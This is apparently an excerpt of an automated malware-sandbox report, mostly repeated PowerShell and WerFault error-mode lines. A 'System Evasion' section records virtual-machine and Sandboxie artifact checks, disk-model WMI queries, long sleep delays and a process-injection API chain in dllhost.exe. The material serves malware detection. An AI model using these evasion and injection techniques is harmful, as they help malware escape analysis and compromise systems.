Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\System32\dllhost.exeCode function: OpenProcess,IsWow64Process,CloseHandle,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,CloseHandle,CloseHandle,38_2_0000000140001868
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Model FROM Win32_DiskDrive
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Manufacturer, Model FROM Win32_DiskDrive
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Model FROM Win32_DiskDrive
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Manufacturer, Model FROM Win32_DiskDrive
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Model FROM Win32_DiskDrive
Source: powershell.exe, 00000008.00000002.2406288380.000001D49FC8C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
Source: powershell.exe, 00000008.00000002.2406288380.000001D49FC8C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: VBoxGuest
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: vmci
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: HGFS
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: VBoxTrayIPC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: \pipe\VBoxTrayIPC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: VBoxMiniRdrDN
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\dllhost.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6365
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3527
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6194
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 527
Source: C:\Windows\System32\cmd.exeWindow / User API: threadDelayed 419
Source: C:\Windows\System32\conhost.exeWindow / User API: threadDelayed 417
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6569
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3067
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3567
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2428
Source: C:\Windows\System32\dllhost.exeWindow / User API: threadDelayed 423
Source: C:\Windows\System32\winlogon.exeWindow / User API: threadDelayed 645
Source: C:\Windows\System32\lsass.exeWindow / User API: threadDelayed 582
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 554
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 523
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 511
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 497
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 439
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 492
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 461
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 459
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 472
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 461
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 454
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 457
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 447
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 449
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 444
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 445
Source: C:\Windows\System32\dllhost.exeEvasive API call chain: RegOpenKey,DecisionNodes,ExitProcessgraph_38-15502
Source: C:\Windows\System32\dllhost.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_38-15806
Source: C:\Windows\System32\cmd.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_17-18405
Source: C:\Windows\System32\dllhost.exeEvasive API call chain: RegQueryValue,DecisionNodes,ExitProcessgraph_38-15506
Source: C:\Windows\System32\winlogon.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleep
Source: C:\Windows\System32\dllhost.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_38-15597
Source: C:\Windows\System32\cmd.exeAPI coverage: 4.5 %
Source: C:\Windows\System32\conhost.exeAPI coverage: 8.0 %
Source: C:\Windows\System32\conhost.exeAPI coverage: 8.0 %
Source: C:\Windows\System32\winlogon.exeAPI coverage: 9.0 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2324Thread sleep count: 6365 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3152Thread sleep count: 3527 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1268Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1088Thread sleep count: 6194 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5672Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1924Thread sleep count: 527 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 936Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\cmd.exe TID: 7480Thread sleep time: -41900s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1280Thread sleep time: -10145709240540247s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3780Thread sleep count: 3567 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3780Thread sleep count: 2428 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7144Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5776Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\dllhost.exe TID: 1424Thread sleep count: 423 > 30
Source: C:\Windows\System32\dllhost.exe TID: 1424Thread sleep time: -42300s >= -30000s
Source: C:\Windows\System32\dllhost.exe TID: 2616Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\winlogon.exe TID: 3604Thread sleep count: 645 > 30
Source: C:\Windows\System32\winlogon.exe TID: 3604Thread sleep time: -64500s >= -30000s
Source: C:\Windows\System32\lsass.exe TID: 5504Thread sleep count: 582 > 30
Source: C:\Windows\System32\lsass.exe TID: 5504Thread sleep time: -58200s >= -30000s
